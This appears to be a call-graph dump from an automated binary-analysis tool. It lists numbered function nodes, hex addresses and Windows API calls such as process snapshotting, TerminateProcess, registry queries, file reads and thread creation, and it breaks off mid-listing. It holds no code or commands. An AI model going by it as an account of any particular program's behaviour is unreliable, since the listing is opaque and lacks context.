b52dd7 ISource 103773->103790 103777 b53160 9 API calls 103774->103777 103774->103790 103775->103773 103776->103773 103787 b52d73 103777->103787 103780 b52f2d 103780->103740 103781->103773 103782 b52e8b ISource 103782->103780 103885 b5e322 22 API calls ISource 103782->103885 103783->103769 103783->103770 103893 bb3fe1 82 API calls __wsopen_s 103784->103893 103785 b53160 9 API calls 103785->103790 103789 b4bed9 22 API calls 103787->103789 103787->103790 103789->103790 103790->103767 103790->103782 103790->103785 103813 bbf94a 103790->103813 103822 b5ac3e 103790->103822 103841 bc9fe8 103790->103841 103844 bcad47 103790->103844 103895 bb3fe1 82 API calls __wsopen_s 103790->103895 103795->103740 103796->103740 103797->103710 103798->103720 103799->103736 103800->103720 103801->103720 103802->103720 103804 b531a1 103803->103804 103805 b5317d 103803->103805 103896 b605b2 5 API calls __Init_thread_wait 103804->103896 103812 b52bb0 103805->103812 103898 b605b2 5 API calls __Init_thread_wait 103805->103898 103808 b531ab 103808->103805 103897 b60568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103808->103897 103809 b59f47 103809->103812 103899 b60568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103809->103899 103812->103753 103814 b6017b 22 API calls 103813->103814 103815 bbf95b 103814->103815 103900 b4423c 103815->103900 103821 bbf999 ISource 103821->103790 103823 b48ec0 53 API calls 103822->103823 103824 b5ac68 103823->103824 103825 b5bc58 22 API calls 103824->103825 103826 b5ac7f 103825->103826 103837 b5b09b _wcslen 103826->103837 103931 b4c98d 39 API calls 103826->103931 103829 b5bbbe 43 API calls 103829->103837 103830 b47ad5 22 API calls 103830->103837 103831 b46c03 22 API calls 103831->103837 103834 b5b1fb 103834->103790 103835 b48ec0 53 API calls 103835->103837 103836 b4c98d 39 API calls 103836->103837 103837->103829 103837->103830 103837->103831 103837->103834 103837->103835 103837->103836 103838 b48577 22 API calls 103837->103838 103839 b4396b 61 API calls 103837->103839 103840 b43907 Shell_NotifyIconW 103837->103840 103932 b64d98 103837->103932 103942 b4ad40 22 API calls __fread_nolock 103837->103942 103943 b47b1a 22 API calls 103837->103943 103838->103837 103839->103837 103840->103837 103947 bc89b6 103841->103947 103843 bc9ff8 103843->103790 103845 b48ec0 53 API calls 103844->103845 103846 bcad63 103845->103846 104061 badd87 CreateToolhelp32Snapshot Process32FirstW 103846->104061 103848 bcad72 103848->103790 103850 bc7b38 103849->103850 103851 bc7b52 103849->103851 104093 bb3fe1 82 API calls __wsopen_s 103850->104093 104082 bc60e6 103851->104082 103854 bc7b4a 103854->103751 103856 b50340 190 API calls 103857 bc7bc1 103856->103857 103857->103854 103858 bc7c5c 103857->103858 103861 bc7c03 103857->103861 103859 bc7cb0 103858->103859 103860 bc7c62 103858->103860 103859->103854 103862 b48ec0 53 API calls 103859->103862 104094 bb1ad8 22 API calls 103860->104094 103866 bb148b 22 API calls 103861->103866 103864 bc7cc2 103862->103864 103867 b4c2c9 22 API calls 103864->103867 103865 bc7c85 104095 b4bd07 22 API calls 103865->104095 103869 bc7c3b 103866->103869 103870 bc7ce6 CharUpperBuffW 103867->103870 103871 b52b20 190 API calls 103869->103871 103872 bc7d00 103870->103872 103871->103854 103873 bc7d07 103872->103873 103874 bc7d53 103872->103874 104089 bb148b 103873->104089 103875 b48ec0 53 API calls 103874->103875 103876 bc7d5b 103875->103876 104096 b5aa65 23 API calls 103876->104096 103880 b52b20 190 API calls 103880->103854 103881 bc7d65 103881->103854 103882 b48ec0 53 API calls 103881->103882 103883 bc7d80 103882->103883 104097 b4bd07 22 API calls 103883->104097 103885->103782 103886->103750 103887->103759 103888->103763 103889->103767 103890->103767 103891->103790 103892->103790 103893->103790 103894->103787 103895->103790 103896->103808 103897->103805 103898->103809 103899->103812 103901 b6014b 22 API calls 103900->103901 103902 b4424e 103901->103902 103903 b48ec0 103902->103903 103904 b48ed5 103903->103904 103905 b48ed2 GetEnvironmentVariableW 103903->103905 103906 b48edd 103904->103906 103907 b48f0b 103904->103907 103926 bb160f 22 API calls 103905->103926 103927 b65536 26 API calls 103906->103927 103908 b86b1f 103907->103908 103910 b48f1d 103907->103910 103917 b86a38 103907->103917 103930 b654f3 26 API calls 103908->103930 103928 b5fe6f 51 API calls 103910->103928 103911 b48eed 103916 b6014b 22 API calls 103911->103916 103914 b86b37 103914->103914 103918 b48ef7 103916->103918 103920 b6017b 22 API calls 103917->103920 103925 b86ab1 103917->103925 103919 b4b329 22 API calls 103918->103919 103919->103905 103921 b86a81 103920->103921 103922 b6014b 22 API calls 103921->103922 103923 b86aa8 103922->103923 103924 b4b329 22 API calls 103923->103924 103924->103925 103929 b5fe6f 51 API calls 103925->103929 103926->103821 103927->103911 103928->103911 103929->103908 103930->103914 103931->103837 103933 b64da6 103932->103933 103934 b64e1b 103932->103934 103941 b64dcb 103933->103941 103944 b6f649 20 API calls __dosmaperr 103933->103944 103946 b64e2d 40 API calls 4 library calls 103934->103946 103936 b64e28 103936->103837 103938 b64db2 103945 b72b5c 26 API calls ___std_exception_copy 103938->103945 103940 b64dbd 103940->103837 103941->103837 103942->103837 103943->103837 103944->103938 103945->103940 103946->103936 103948 b48ec0 53 API calls 103947->103948 103949 bc89ed 103948->103949 103972 bc8a32 ISource 103949->103972 103985 bc9730 103949->103985 103951 bc8cde 103952 bc8eac 103951->103952 103956 bc8cec 103951->103956 104036 bc9941 60 API calls 103952->104036 103955 bc8ebb 103955->103956 103957 bc8ec7 103955->103957 103998 bc88e3 103956->103998 103957->103972 103958 b48ec0 53 API calls 103975 bc8aa6 103958->103975 103963 bc8d25 104013 b5ffe0 103963->104013 103966 bc8d5f 104021 b47e12 103966->104021 103967 bc8d45 104020 bb3fe1 82 API calls __wsopen_s 103967->104020 103970 bc8d50 GetCurrentProcess TerminateProcess 103970->103966 103972->103843 103975->103951 103975->103958 103975->103972 104018 ba4ad3 22 API calls __fread_nolock 103975->104018 104019 bc8f7a 42 API calls _strftime 103975->104019 103977 bc8f22 103977->103972 103981 bc8f36 FreeLibrary 103977->103981 103978 bc8d9e 104033 bc95d8 75 API calls 103978->104033 103981->103972 103983 bc8daf 103983->103977 104034 b51ca0 22 API calls 103983->104034 104035 b4b4c8 22 API calls 103983->104035 104037 bc95d8 75 API calls 103983->104037 103986 b4c2c9 22 API calls 103985->103986 103987 bc974b CharLowerBuffW 103986->103987 104038 ba9805 103987->104038 103991 b4bf73 22 API calls 103992 bc9787 103991->103992 104045 b4acc0 22 API calls __fread_nolock 103992->104045 103994 bc979b 103995 b4adf4 22 API calls 103994->103995 103997 bc97a5 _wcslen 103995->103997 103996 bc98bb _wcslen 103996->103975 103997->103996 104046 bc8f7a 42 API calls _strftime 103997->104046 103999 bc88fe 103998->103999 104003 bc8949 103998->104003 104000 b6017b 22 API calls 103999->104000 104001 bc8920 104000->104001 104002 b6014b 22 API calls 104001->104002 104001->104003 104002->104001 104004 bc9af3 104003->104004 104005 bc9b17 _strcat _wcslen 104004->104005 104006 bc9d08 ISource 104004->104006 104005->104006 104007 b4c63f 39 API calls 104005->104007 104008 b4c98d 39 API calls 104005->104008 104009 b4ca5b 39 API calls 104005->104009 104010 b48ec0 53 API calls 104005->104010 104011 b6ed7c 21 API calls ___std_exception_copy 104005->104011 104049 baf8c5 24 API calls _wcslen 104005->104049 104006->103963 104007->104005 104008->104005 104009->104005 104010->104005 104011->104005 104015 b5fff5 104013->104015 104014 b6008d SetErrorMode 104017 b6005b 104014->104017 104015->104014 104016 b6007b CloseHandle 104015->104016 104015->104017 104016->104017 104017->103966 104017->103967 104018->103975 104019->103975 104020->103970 104022 b47e1a 104021->104022 104023 b6014b 22 API calls 104022->104023 104024 b47e28 104023->104024 104050 b48445 104024->104050 104027 b48470 104053 b4c760 104027->104053 104029 b48480 104030 b6017b 22 API calls 104029->104030 104031 b4851c 104029->104031 104030->104031 104031->103983 104032 b51ca0 22 API calls 104031->104032 104032->103978 104033->103983 104034->103983 104035->103983 104036->103955 104037->103983 104039 ba9825 _wcslen 104038->104039 104040 ba9914 104039->104040 104043 ba985a 104039->104043 104044 ba9919 104039->104044 104040->103991 104040->103997 104043->104040 104047 b5e36b 41 API calls 104043->104047 104044->104040 104048 b5e36b 41 API calls 104044->104048 104045->103994 104046->103996 104047->104043 104048->104044 104049->104005 104051 b6014b 22 API calls 104050->104051 104052 b47e30 104051->104052 104052->104027 104054 b4c76b 104053->104054 104055 b91285 104054->104055 104060 b4c773 ISource 104054->104060 104056 b6014b 22 API calls 104055->104056 104058 b91291 104056->104058 104057 b4c77a 104057->104029 104058->104058 104059 b4c7e0 22 API calls 104059->104060 104060->104057 104060->104059 104071 bae80e 104061->104071 104063 bade86 CloseHandle 104063->103848 104064 baddd4 Process32NextW 104064->104063 104068 baddcd 104064->104068 104065 b4bf73 22 API calls 104065->104068 104066 b4b329 22 API calls 104066->104068 104068->104063 104068->104064 104068->104065 104068->104066 104077 b4568e 22 API calls 104068->104077 104078 b47bb5 22 API calls 104068->104078 104079 b5e36b 41 API calls 104068->104079 104072 bae819 104071->104072 104073 bae830 104072->104073 104076 bae836 104072->104076 104080 b66722 GetStringTypeW _strftime 104072->104080 104081 b6666b 39 API calls _strftime 104073->104081 104076->104068 104077->104068 104078->104068 104079->104068 104080->104072 104081->104076 104083 bc6101 104082->104083 104088 bc614f 104082->104088 104084 b6017b 22 API calls 104083->104084 104087 bc6123 104084->104087 104085 b6014b 22 API calls 104085->104087 104087->104085 104087->104088 104098 bb1400 22 API calls 104087->104098 104088->103856 104090 bb1499 104089->104090 104092 bb14d2 104089->104092 104091 b6014b 22 API calls 104090->104091 104090->104092 104091->104092 104092->103880 104093->103854 104094->103865 104095->103854 104096->103881 104097->103854 104098->104087 104099 b515ff 104100 b5e3d5 22 API calls 104099->104100 104101 b51615 104100->104101 104106 b5e439 104101->104106 104103 b5163f 104118 bb3fe1 82 API calls __wsopen_s 104103->104118 104105 b96207 104107 b47ad5 22 API calls 104106->104107 104108 b5e470 104107->104108 104109 b4b329 22 API calls 104108->104109 104111 b5e4a1 104108->104111 104110 b9e53e 104109->104110 104119 b47bb5 22 API calls 104110->104119 104111->104103 104113 b9e549 104120 b5e7c1 40 API calls 104113->104120 104115 b9e55c 104117 b9e560 104115->104117 104121 b4b4c8 22 API calls 104115->104121 104117->104117 104118->104105 104119->104113 104120->104115 104121->104117 104122 b41098 104127 b45fc8 104122->104127 104126 b410a7 104128 b4bf73 22 API calls 104127->104128 104129 b45fdf GetVersionExW 104128->104129 104130 b48577 22 API calls 104129->104130 104131 b4602c 104130->104131 104132 b4adf4 22 API calls 104131->104132 104144 b46062 104131->104144 104133 b46056 104132->104133 104148 b455dc 104133->104148 104134 b4611c GetCurrentProcess IsWow64Process 104136 b46138 104134->104136 104137 b85269 GetSystemInfo 104136->104137 104138 b46150 LoadLibraryA 104136->104138 104139 b46161 GetProcAddress 104138->104139 104140 b4619d GetSystemInfo 104138->104140 104139->104140 104142 b46171 GetNativeSystemInfo 104139->104142 104143 b46177 104140->104143 104141 b85224 104142->104143 104145 b4109d 104143->104145 104146 b4617b FreeLibrary 104143->104146 104144->104134 104144->104141 104147 b60413 29 API calls __onexit 104145->104147 104146->104145 104147->104126 104149 b455ea 104148->104149 104150 b4adf4 22 API calls 104149->104150 104151 b455fe 104150->104151 104151->104144 104152 b7947a 104153 b79487 104152->104153 104157 b7949f 104152->104157 104214 b6f649 20 API calls __dosmaperr 104153->104214 104155 b7948c 104215 b72b5c 26 API calls ___std_exception_copy 104155->104215 104158 b794fa 104157->104158 104166 b79497 104157->104166 104172 b80144 104157->104172 104177 b6dcc5 104158->104177 104161 b79512 104184 b78fb2 104161->104184 104163 b79519 104164 b6dcc5 __fread_nolock 26 API calls 104163->104164 104163->104166 104165 b79545 104164->104165 104165->104166 104167 b6dcc5 __fread_nolock 26 API calls 104165->104167 104168 b79553 104167->104168 104168->104166 104169 b6dcc5 __fread_nolock 26 API calls 104168->104169 104170 b79563 104169->104170 104171 b6dcc5 __fread_nolock 26 API calls 104170->104171 104171->104166 104216 b73b93 104172->104216 104176 b80169 104176->104158 104178 b6dce6 104177->104178 104179 b6dcd1 104177->104179 104178->104161 104232 b6f649 20 API calls __dosmaperr 104179->104232 104181 b6dcd6 104233 b72b5c 26 API calls ___std_exception_copy 104181->104233 104183 b6dce1 104183->104161 104185 b78fbe ___scrt_is_nonwritable_in_current_image 104184->104185 104186 b78fc6 104185->104186 104187 b78fde 104185->104187 104300 b6f636 20 API calls __dosmaperr 104186->104300 104189 b790a4 104187->104189 104193 b79017 104187->104193 104307 b6f636 20 API calls __dosmaperr 104189->104307 104190 b78fcb 104301 b6f649 20 API calls __dosmaperr 104190->104301 104195 b79026 104193->104195 104196 b7903b 104193->104196 104194 b790a9 104308 b6f649 20 API calls __dosmaperr 104194->104308 104302 b6f636 20 API calls __dosmaperr 104195->104302 104234 b754ba EnterCriticalSection 104196->104234 104200 b79033 104309 b72b5c 26 API calls ___std_exception_copy 104200->104309 104201 b7902b 104303 b6f649 20 API calls __dosmaperr 104201->104303 104202 b79041 104203 b79072 104202->104203 104204 b7905d 104202->104204 104235 b790c5 104203->104235 104304 b6f649 20 API calls __dosmaperr 104204->104304 104206 b78fd3 __wsopen_s 104206->104163 104210 b79062 104305 b6f636 20 API calls __dosmaperr 104210->104305 104211 b7906d 104306 b7909c LeaveCriticalSection __wsopen_s 104211->104306 104214->104155 104215->104166 104217 b73bd1 104216->104217 104221 b73ba1 __dosmaperr 104216->104221 104230 b6f649 20 API calls __dosmaperr 104217->104230 104219 b73bbc RtlAllocateHeap 104220 b73bcf 104219->104220 104219->104221 104223 b72d38 104220->104223 104221->104217 104221->104219 104229 b6521d 7 API calls 2 library calls 104221->104229 104224 b72d43 RtlFreeHeap 104223->104224 104225 b72d6c __dosmaperr 104223->104225 104224->104225 104226 b72d58 104224->104226 104225->104176 104231 b6f649 20 API calls __dosmaperr 104226->104231 104228 b72d5e GetLastError 104228->104225 104229->104221 104230->104220 104231->104228 104232->104181 104233->104183 104234->104202 104236 b790d7 104235->104236 104237 b790ef 104235->104237 104319 b6f636 20 API calls __dosmaperr 104236->104319 104238 b79459 104237->104238 104242 b79134 104237->104242 104336 b6f636 20 API calls __dosmaperr 104238->104336 104240 b790dc 104320 b6f649 20 API calls __dosmaperr 104240->104320 104246 b7913f 104242->104246 104247 b790e4 104242->104247 104253 b7916f 104242->104253 104244 b7945e 104337 b6f649 20 API calls __dosmaperr 104244->104337 104321 b6f636 20 API calls __dosmaperr 104246->104321 104247->104211 104248 b7914c 104338 b72b5c 26 API calls ___std_exception_copy 104248->104338 104250 b79144 104322 b6f649 20 API calls __dosmaperr 104250->104322 104254 b791ae 104253->104254 104255 b79188 104253->104255 104258 b791ca 104253->104258 104323 b6f636 20 API calls __dosmaperr 104254->104323 104255->104254 104256 b79195 104255->104256 104310 b7fc1b 104256->104310 104260 b73b93 _strftime 21 API calls 104258->104260 104259 b791b3 104324 b6f649 20 API calls __dosmaperr 104259->104324 104263 b791e1 104260->104263 104266 b72d38 _free 20 API calls 104263->104266 104264 b791ba 104325 b72b5c 26 API calls ___std_exception_copy 104264->104325 104265 b79333 104268 b793a9 104265->104268 104271 b7934c GetConsoleMode 104265->104271 104269 b791ea 104266->104269 104270 b793ad ReadFile 104268->104270 104272 b72d38 _free 20 API calls 104269->104272 104274 b793c7 104270->104274 104275 b79421 GetLastError 104270->104275 104271->104268 104276 b7935d 104271->104276 104273 b791f1 104272->104273 104277 b79216 104273->104277 104278 b791fb 104273->104278 104274->104275 104281 b7939e 104274->104281 104279 b79385 104275->104279 104280 b7942e 104275->104280 104276->104270 104282 b79363 ReadConsoleW 104276->104282 104328 b797a4 104277->104328 104326 b6f649 20 API calls __dosmaperr 104278->104326 104298 b791c5 __fread_nolock 104279->104298 104331 b6f613 20 API calls __dosmaperr 104279->104331 104334 b6f649 20 API calls __dosmaperr 104280->104334 104293 b79403 104281->104293 104294 b793ec 104281->104294 104281->104298 104282->104281 104287 b7937f GetLastError 104282->104287 104283 b72d38 _free 20 API calls 104283->104247 104287->104279 104288 b79200 104327 b6f636 20 API calls __dosmaperr 104288->104327 104289 b79433 104335 b6f636 20 API calls __dosmaperr 104289->104335 104296 b7941a 104293->104296 104293->104298 104332 b78de1 31 API calls 3 library calls 104294->104332 104333 b78c21 29 API calls __wsopen_s 104296->104333 104298->104283 104299 b7941f 104299->104298 104300->104190 104301->104206 104302->104201 104303->104200 104304->104210 104305->104211 104306->104206 104307->104194 104308->104200 104309->104206 104311 b7fc35 104310->104311 104312 b7fc28 104310->104312 104316 b7fc41 104311->104316 104340 b6f649 20 API calls __dosmaperr 104311->104340 104339 b6f649 20 API calls __dosmaperr 104312->104339 104315 b7fc2d 104315->104265 104316->104265 104317 b7fc62 104341 b72b5c 26 API calls ___std_exception_copy 104317->104341 104319->104240 104320->104247 104321->104250 104322->104248 104323->104259 104324->104264 104325->104298 104326->104288 104327->104298 104342 b7970b 104328->104342 104331->104298 104332->104298 104333->104299 104334->104289 104335->104298 104336->104244 104337->104248 104338->104247 104339->104315 104340->104317 104341->104315 104351 b75737 104342->104351 104344 b7971d 104345 b79736 SetFilePointerEx 104344->104345 104346 b79725 104344->104346 104347 b7974e GetLastError 104345->104347 104348 b7972a 104345->104348 104364 b6f649 20 API calls __dosmaperr 104346->104364 104365 b6f613 20 API calls __dosmaperr 104347->104365 104348->104256 104352 b75744 104351->104352 104354 b75759 104351->104354 104366 b6f636 20 API calls __dosmaperr 104352->104366 104358 b7577e 104354->104358 104368 b6f636 20 API calls __dosmaperr 104354->104368 104355 b75749 104367 b6f649 20 API calls __dosmaperr 104355->104367 104358->104344 104359 b75789 104369 b6f649 20 API calls __dosmaperr 104359->104369 104360 b75751 104360->104344 104362 b75791 104370 b72b5c 26 API calls ___std_exception_copy 104362->104370 104364->104348 104365->104348 104366->104355 104367->104360 104368->104359 104369->104362 104370->104360 104371 b9e737 104372 b9e6e4 104371->104372 104374 bae83e SHGetFolderPathW 104372->104374 104375 b48577 22 API calls 104374->104375 104376 bae86b 104375->104376 104376->104372 104377 b4105b 104382 b452a7 104377->104382 104379 b4106a 104413 b60413 29 API calls __onexit 104379->104413 104381 b41074 104383 b452b7 __wsopen_s 104382->104383 104384 b4bf73 22 API calls 104383->104384 104385 b4536d 104384->104385 104414 b45594 104385->104414 104387 b45376 104421 b45238 104387->104421 104390 b46b7c 22 API calls 104391 b4538f 104390->104391 104427 b46a7c 104391->104427 104394 b4bf73 22 API calls 104395 b453a7 104394->104395 104433 b4bd57 104395->104433 104398 b84be6 RegQueryValueExW 104399 b84c7c RegCloseKey 104398->104399 104400 b84c03 104398->104400 104403 b453d2 104399->104403 104411 b84c8e _wcslen 104399->104411 104401 b6017b 22 API calls 104400->104401 104402 b84c1c 104401->104402 104404 b4423c 22 API calls 104402->104404 104403->104379 104405 b84c27 RegQueryValueExW 104404->104405 104406 b84c44 104405->104406 104408 b84c5e ISource 104405->104408 104407 b48577 22 API calls 104406->104407 104407->104408 104408->104399 104409 b4b329 22 API calls 104409->104411 104410 b46a7c 22 API calls 104410->104411 104411->104403 104411->104409 104411->104410 104412 b4655e 22 API calls 104411->104412 104412->104411 104413->104381 104439 b822d0 104414->104439 104417 b4b329 22 API calls 104418 b455c7 104417->104418 104441 b45851 104418->104441 104420 b455d1 104420->104387 104422 b822d0 __wsopen_s 104421->104422 104423 b45245 GetFullPathNameW 104422->104423 104424 b45267 104423->104424 104425 b48577 22 API calls 104424->104425 104426 b45285 104425->104426 104426->104390 104428 b46a8b 104427->104428 104432 b46aac __fread_nolock 104427->104432 104431 b6017b 22 API calls 104428->104431 104429 b6014b 22 API calls 104430 b4539e 104429->104430 104430->104394 104431->104432 104432->104429 104434 b4bd71 104433->104434 104438 b453b0 RegOpenKeyExW 104433->104438 104435 b6014b 22 API calls 104434->104435 104436 b4bd7b 104435->104436 104437 b6017b 22 API calls 104436->104437 104437->104438 104438->104398 104438->104403 104440 b455a1 GetModuleFileNameW 104439->104440 104440->104417 104442 b822d0 __wsopen_s 104441->104442 104443 b4585e GetFullPathNameW 104442->104443 104444 b4587d 104443->104444 104445 b45898 104443->104445 104446 b48577 22 API calls 104444->104446 104447 b4bd57 22 API calls 104445->104447 104448 b45889 104446->104448 104447->104448 104449 b455dc 22 API calls 104448->104449 104450 b45895 104449->104450 104450->104420 104451 b41044 104456 b42793 104451->104456 104453 b4104a 104491 b60413 29 API calls __onexit 104453->104491 104455 b41054 104492 b42a38 104456->104492 104460 b4280a 104461 b4bf73 22 API calls 104460->104461 104462 b42814 104461->104462 104463 b4bf73 22 API calls 104462->104463 104464 b4281e 104463->104464 104465 b4bf73 22 API calls 104464->104465 104466 b42828 104465->104466 104467 b4bf73 22 API calls 104466->104467 104468 b42866 104467->104468 104469 b4bf73 22 API calls 104468->104469 104470 b42932 104469->104470 104502 b42dbc 104470->104502 104474 b42964 104475 b4bf73 22 API calls 104474->104475 104476 b4296e 104475->104476 104477 b53160 9 API calls 104476->104477 104478 b42999 104477->104478 104529 b43166 104478->104529 104480 b429b5 104481 b429c5 GetStdHandle 104480->104481 104482 b42a1a 104481->104482 104483 b839e7 104481->104483 104485 b42a27 OleInitialize 104482->104485 104483->104482 104484 b6014b 22 API calls 104483->104484 104486 b839f7 104484->104486 104485->104453 104536 bb0ac4 InitializeCriticalSectionAndSpinCount 104486->104536 104488 b83a00 104539 bb12eb 104488->104539 104491->104455 104542 b42a91 104492->104542 104495 b42a91 22 API calls 104496 b42a70 104495->104496 104497 b4bf73 22 API calls 104496->104497 104498 b42a7c 104497->104498 104499 b48577 22 API calls 104498->104499 104500 b427c9 104499->104500 104501 b4327e 6 API calls 104500->104501 104501->104460 104503 b4bf73 22 API calls 104502->104503 104504 b42dcc 104503->104504 104505 b4bf73 22 API calls 104504->104505 104506 b42dd4 104505->104506 104549 b481d6 104506->104549 104509 b481d6 22 API calls 104510 b42de4 104509->104510 104511 b4bf73 22 API calls 104510->104511 104512 b42def 104511->104512 104513 b6014b 22 API calls 104512->104513 104514 b4293c 104513->104514 104515 b43205 104514->104515 104516 b43213 104515->104516 104517 b4bf73 22 API calls 104516->104517 104518 b4321e 104517->104518 104519 b4bf73 22 API calls 104518->104519 104520 b43229 104519->104520 104521 b4bf73 22 API calls 104520->104521 104522 b43234 104521->104522 104523 b4bf73 22 API calls 104522->104523 104524 b4323f 104523->104524 104525 b481d6 22 API calls 104524->104525 104526 b4324a 104525->104526 104527 b6014b 22 API calls 104526->104527 104528 b43251 RegisterWindowMessageW 104527->104528 104528->104474 104530 b43176 104529->104530 104531 b83c8f 104529->104531 104532 b6014b 22 API calls 104530->104532 104552 bb3c4e 22 API calls 104531->104552 104534 b4317e 104532->104534 104534->104480 104535 b83c9a 104553 bb0d18 104536->104553 104540 bb12f9 CreateThread 104539->104540 104541 b83a0c CloseHandle 104539->104541 104540->104541 104556 bb12d1 104540->104556 104541->104482 104543 b4bf73 22 API calls 104542->104543 104544 b42a9c 104543->104544 104545 b4bf73 22 API calls 104544->104545 104546 b42aa4 104545->104546 104547 b4bf73 22 API calls 104546->104547 104548 b42a66 104547->104548 104548->104495 104550 b4bf73 22 API calls 104549->104550 104551 b42ddc 104550->104551 104551->104509 104552->104535 104554 bb0b03 InterlockedExchange 104553->104554 104555 bb0d26 GetCurrentProcess GetCurrentProcess DuplicateHandle 104553->104555 104554->104488 104555->104554 104557 bb12db 104556->104557 104558 bb12e0 104556->104558 104560 bb1196 InterlockedExchange 104557->104560 104561 bb11c7 104560->104561 104562 bb11c1 104560->104562 104564 b6017b 22 API calls 104561->104564 104563 b6017b 22 API calls 104562->104563 104563->104561 104565 bb11d9 ReadFile 104564->104565 104566 bb12a8 104565->104566 104567 bb11fc 104565->104567 104569 bb12c1 InterlockedExchange 104566->104569 104567->104566 104568 bb1206 EnterCriticalSection 104567->104568 104572 bb122e __fread_nolock 104567->104572 104568->104567 104568->104572 104569->104558 104570 bb1279 LeaveCriticalSection ReadFile 104570->104566 104570->104567 104571 b6017b 22 API calls 104571->104572 104572->104570 104572->104571 104573 b4f4c0 104576 b5a025 104573->104576 104575 b4f4cc 104577 b5a046 104576->104577 104582 b5a0a3 104576->104582 104578 b50340 191 API calls 104577->104578 104577->104582 104583 b5a077 104578->104583 104580 b9806b 104580->104580 104581 b5a0e7 104581->104575 104582->104581 104585 bb3fe1 82 API calls __wsopen_s 104582->104585 104583->104581 104583->104582 104584 b4bed9 22 API calls 104583->104584 104584->104582 104585->104580 104586 b78782 104591 b7853e 104586->104591 104589 b787aa 104597 b7856f try_get_first_available_module 104591->104597 104592 b786b8 104596 b786c3 104592->104596 104609 b6f649 20 API calls __dosmaperr 104592->104609 104594 b7876e 104610 b72b5c 26 API calls ___std_exception_copy 104594->104610 104596->104589 104603 b80d04 104596->104603 104597->104592 104606 b6917b 40 API calls 2 library calls 104597->104606 104599 b7870c 104599->104592 104607 b6917b 40 API calls 2 library calls 104599->104607 104601 b7872b 104601->104592 104608 b6917b 40 API calls 2 library calls 104601->104608 104611 b80401 104603->104611 104605 b80d1f 104605->104589 104606->104599 104607->104601 104608->104592 104609->104594 104610->104596 104614 b8040d ___scrt_is_nonwritable_in_current_image 104611->104614 104612 b8041b 104669 b6f649 20 API calls __dosmaperr 104612->104669 104614->104612 104616 b80454 104614->104616 104615 b80420 104670 b72b5c 26 API calls ___std_exception_copy 104615->104670 104622 b809db 104616->104622 104621 b8042a __wsopen_s 104621->104605 104672 b807af 104622->104672 104625 b80a0d 104704 b6f636 20 API calls __dosmaperr 104625->104704 104626 b80a26 104690 b75594 104626->104690 104629 b80a2b 104631 b80a4b 104629->104631 104632 b80a34 104629->104632 104630 b80a12 104705 b6f649 20 API calls __dosmaperr 104630->104705 104703 b8071a CreateFileW 104631->104703 104706 b6f636 20 API calls __dosmaperr 104632->104706 104636 b80a39 104707 b6f649 20 API calls __dosmaperr 104636->104707 104637 b80478 104671 b804a1 LeaveCriticalSection __wsopen_s 104637->104671 104639 b80b01 GetFileType 104640 b80b0c GetLastError 104639->104640 104641 b80b53 104639->104641 104710 b6f613 20 API calls __dosmaperr 104640->104710 104712 b754dd 21 API calls 2 library calls 104641->104712 104642 b80ad6 GetLastError 104709 b6f613 20 API calls __dosmaperr 104642->104709 104645 b80a84 104645->104639 104645->104642 104708 b8071a CreateFileW 104645->104708 104646 b80b1a CloseHandle 104646->104630 104648 b80b43 104646->104648 104711 b6f649 20 API calls __dosmaperr 104648->104711 104650 b80ac9 104650->104639 104650->104642 104652 b80b74 104653 b80bc0 104652->104653 104713 b8092b 72 API calls 3 library calls 104652->104713 104658 b80bed 104653->104658 104714 b804cd 72 API calls 4 library calls 104653->104714 104654 b80b48 104654->104630 104657 b80be6 104657->104658 104659 b80bfe 104657->104659 104715 b78a2e 104658->104715 104659->104637 104661 b80c7c CloseHandle 104659->104661 104730 b8071a CreateFileW 104661->104730 104663 b80ca7 104664 b80cb1 GetLastError 104663->104664 104665 b80cdd 104663->104665 104731 b6f613 20 API calls __dosmaperr 104664->104731 104665->104637 104667 b80cbd 104732 b756a6 21 API calls 2 library calls 104667->104732 104669->104615 104670->104621 104671->104621 104673 b807d0 104672->104673 104674 b807ea 104672->104674 104673->104674 104740 b6f649 20 API calls __dosmaperr 104673->104740 104733 b8073f 104674->104733 104677 b807df 104741 b72b5c 26 API calls ___std_exception_copy 104677->104741 104679 b80822 104680 b80851 104679->104680 104742 b6f649 20 API calls __dosmaperr 104679->104742 104683 b808a4 104680->104683 104744 b6da7d 26 API calls 2 library calls 104680->104744 104683->104625 104683->104626 104684 b8089f 104684->104683 104686 b8091e 104684->104686 104685 b80846 104743 b72b5c 26 API calls ___std_exception_copy 104685->104743 104745 b72b6c 11 API calls _abort 104686->104745 104689 b8092a 104691 b755a0 ___scrt_is_nonwritable_in_current_image 104690->104691 104748 b732d1 EnterCriticalSection 104691->104748 104694 b755a7 104695 b755cc 104694->104695 104699 b7563a EnterCriticalSection 104694->104699 104702 b755ee 104694->104702 104752 b75373 21 API calls 3 library calls 104695->104752 104696 b75617 __wsopen_s 104696->104629 104698 b755d1 104698->104702 104753 b754ba EnterCriticalSection 104698->104753 104700 b75647 LeaveCriticalSection 104699->104700 104699->104702 104700->104694 104749 b7569d 104702->104749 104703->104645 104704->104630 104705->104637 104706->104636 104707->104630 104708->104650 104709->104630 104710->104646 104711->104654 104712->104652 104713->104653 104714->104657 104716 b75737 __wsopen_s 26 API calls 104715->104716 104718 b78a3e 104716->104718 104717 b78a44 104755 b756a6 21 API calls 2 library calls 104717->104755 104718->104717 104719 b78a76 104718->104719 104721 b75737 __wsopen_s 26 API calls 104718->104721 104719->104717 104722 b75737 __wsopen_s 26 API calls 104719->104722 104724 b78a6d 104721->104724 104725 b78a82 CloseHandle 104722->104725 104723 b78a9c 104726 b78abe 104723->104726 104756 b6f613 20 API calls __dosmaperr 104723->104756 104727 b75737 __wsopen_s 26 API calls 104724->104727 104725->104717 104728 b78a8e GetLastError 104725->104728 104726->104637 104727->104719 104728->104717 104730->104663 104731->104667 104732->104665 104735 b80757 104733->104735 104734 b80772 104734->104679 104735->104734 104746 b6f649 20 API calls __dosmaperr 104735->104746 104737 b80796 104747 b72b5c 26 API calls ___std_exception_copy 104737->104747 104739 b807a1 104739->104679 104740->104677 104741->104674 104742->104685 104743->104680 104744->104684 104745->104689 104746->104737 104747->104739 104748->104694 104754 b73319 LeaveCriticalSection 104749->104754 104751 b756a4 104751->104696 104752->104698 104753->104702 104754->104751 104755->104723 104756->104726 104757 b608a0 104766 b60d02 GetModuleHandleW 104757->104766 104759 b608a8 104760 b608de 104759->104760 104761 b608ac 104759->104761 104768 b65174 28 API calls _abort 104760->104768 104763 b608b7 104761->104763 104767 b65156 28 API calls 